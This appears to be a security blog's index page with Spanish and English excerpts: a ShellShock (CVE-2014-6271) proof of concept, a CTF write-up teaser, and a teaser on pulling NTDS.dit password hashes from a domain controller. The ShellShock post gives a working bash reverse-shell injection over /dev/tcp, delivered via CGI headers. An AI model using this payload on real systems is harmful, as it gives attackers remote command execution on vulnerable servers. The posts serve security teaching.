0

ShellShock# Pure Bash Reverse Shell – PoC

Como hay un ¡BOOM! ahorita, con el Bug CVE-2014-6271 o mejor denominado #ShellShock #BashBleed etc… Decidi poner mi granito de arena, ya todo mundo explico que es, y como se esta explotando y buscando servers vulnerables (Lo puedes hacer con w3af, nmap, etc…)

Despues de encontrarlos se esta tratando de descargar codigos para hacer una conexión remota y obtener asi una shell…Yo me enfocare en crear la conexión remota, sin descargar nada.

De manera muy rápida veamos la vulnerabilidad.

Puedo declarar una función en una variable de entorno en bash y todo bien =)

0_Function

Posteriormente puedo ejecutar un comando y todo bien.

1_env

El problema radica, cuando ingreso comandos dentro de la declaración es son ejecutados.

2_test

Esa cadena esta siendo ejecutada dentro de la variable después de la declaración de la función y eso no debería pasar.

 

PoC

¿Manera de explotarlo? Mucha gente esta adjuntando la declaración de la función y comandos en la cabecera de User-Agent o Cookie, a aplicaciones con scripts CGI y si es vulnerable, ejecutara sus comandos.

Lo normal entonces seria tratar de hacer una conexión remota y obtener una shell, para esto la gente está inyectando código que:

  • Carga código que me permite conectarme remotamente
  • Crea un listener con NetCat ¿Pero si el server no tiene netcat?
  • Infinidad de cosas que se ocurran.

 

Para evitar hacer todo esto, podemos simplemente inyectar código que me cree la conexión y aquí es donde se me ocurre hacer uso de este comando que me crea una shell inversa con comandos puros de bash, que todo bash tiene.

Primero creare un Listener en mi equipo.

3_netcatDespues inyectare la shell:

env x='() { :;}; exec 6<>/dev/tcp/server/port;cat 0<&6 |while read i;do $i 2>&6 1>&6;done’

shell

Y vere que ya puedo ejecutar comandos =)
pwned

Hacer este tipo de rever shell con puro bash lo aprendi de GNUCITIZEN

Saludos ;)

 

2

Bugtraq Cyber Game – Write up

Este post decidí escribirlo en español, así que ahí vamos.

Recientemente participé en el Bugtraq Cyber Gameeste CTF que consistía en 13 retos se dividía en 6 categorías:

  • Web
  • Esteganografia
  • BruteForce
  • Phreaking
  • Criptografía
  • Cracking
  • Y un nivel Extra

bugtraq

De los 13 pude resolver 10, siendo así Cripto2, Stegano2 y Cracking2 los que no pude resolver.

Web 1 Continue Reading

2

Extracting NTDS.dit from a live Domain Controller “The easy way”

Neobits.org is back in the game (read more about), and for my first post in this new neobits.org era, I want to share a simple technique I used last week.

This month, has been so amazing for me:

  • I got my “The Art of Memory Forensics” book.
  • I recovered Neobits.org.
  • Was my 22nd Birthday u.u
  • I officially completed my first pentest for a company.

First of all, I want to thank my friend @Dash for the guidelines, advices, tips and by mentoring me during my first pentest, It has been an amazing experience, and I liked a lot. You are as our security folks named you: “The Messi from hacking in Aztec land”.

During this pentest we were able to hack all of our targets, including the Domain Controller (DC) =) but… now what?

Let’s get this precious file… NTDS.dit. For the readers who don’t know what this file is used for, let me tell you that in this file are contained all the password hashes of the users at the Domain Controller.

Continue Reading